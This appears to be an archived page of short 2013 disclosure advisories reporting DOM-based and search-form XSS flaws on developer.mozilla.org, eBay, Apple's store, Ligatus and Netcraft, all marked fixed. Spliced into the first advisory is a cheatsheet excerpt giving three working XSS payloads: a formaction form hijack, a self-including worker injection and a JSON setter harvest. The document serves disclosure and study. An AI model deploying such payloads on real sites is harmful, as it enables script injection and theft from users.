
SSCHADV2013-010 - developer.mozilla.org - DOM based Cross-site Scripting vulnerability

Advisory: developer.mozilla.org - DOM based Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-010
Author: Stefan Schurtz
Affected Software: Successfully tested on developer.mozilla.org
Vendor URL:
Vendor Status: fixed

=========================
Vulnerability Description
=========================

The website 'developer.mozilla.org' is prone to a DOM based XSS vulnerability.

HTML5 Security Cheatsheet

Here you can find the HTML5 Security Cheatsheet, which is a nice source of some good XSS payloads.

For example:

XSS via formaction – requiring user interaction (1)

A vector displaying the HTML5 form and formaction capabilities for form hijacking outside the actual form.

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

Self-including DOM Worker XSS

A self-including code snippet utilizing a DOM worker and firing a message event to itself, causing script execution.

0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk'))

Self-hijacking JSON literals

In case parts of a JSON literal are controlled by user input, there is a risk of auto-harvesting values from later object members.

<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>

SSCHADV2013-011 - pages.ebay.de - DOM based Cross-site Scripting vulnerability

Advisory: pages.ebay.de - DOM based Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-011
Author: Stefan Schurtz
Affected Software: Successfully tested on pages.ebay.de
Vendor URL:
Vendor Status: fixed

=========================
Vulnerability Description
=========================

The website 'pages.ebay.de' is prone to a DOM based XSS vulnerability.

SSCHADV2013-009 - store.apple.com - DOM based Cross-site Scripting vulnerability

Advisory: store.apple.com - DOM based Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-009
Author: Stefan Schurtz
Affected Software: Successfully tested on store.apple.com
Vendor URL:
Vendor Status: fixed

=========================
Vulnerability Description
=========================

The website 'store.apple.com' is prone to a DOM based XSS vulnerability.

SSCHADV2013-007 - Ligatus Advertising - DOM Based Cross-site Scripting vulnerability

Advisory: Ligatus Advertising - DOM Based Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-007
Author: Stefan Schurtz
Affected Software: Successfully tested on a.ligatus.com
Vendor URL:
Vendor Status: fixed

=========================
Vulnerability Description
=========================

The 'et' parameter in Ligatus Advertising is prone to a DOM Based XSS vulnerability.

SSCHADV2013-008 - www.netcraft.com - Search Form Cross-site Scripting vulnerability

Advisory: www.netcraft.com - Search Form Cross-site Scripting vulnerability
Advisory ID: SSCHADV2013-008
Author: Stefan Schurtz
Affected Software: Successfully tested on www.netcraft.com
Vendor URL:
Vendor Status: fixed

=========================
Vulnerability Description
=========================

The 'q' parameter in the search form on www.netcraft.com is prone to an XSS vulnerability.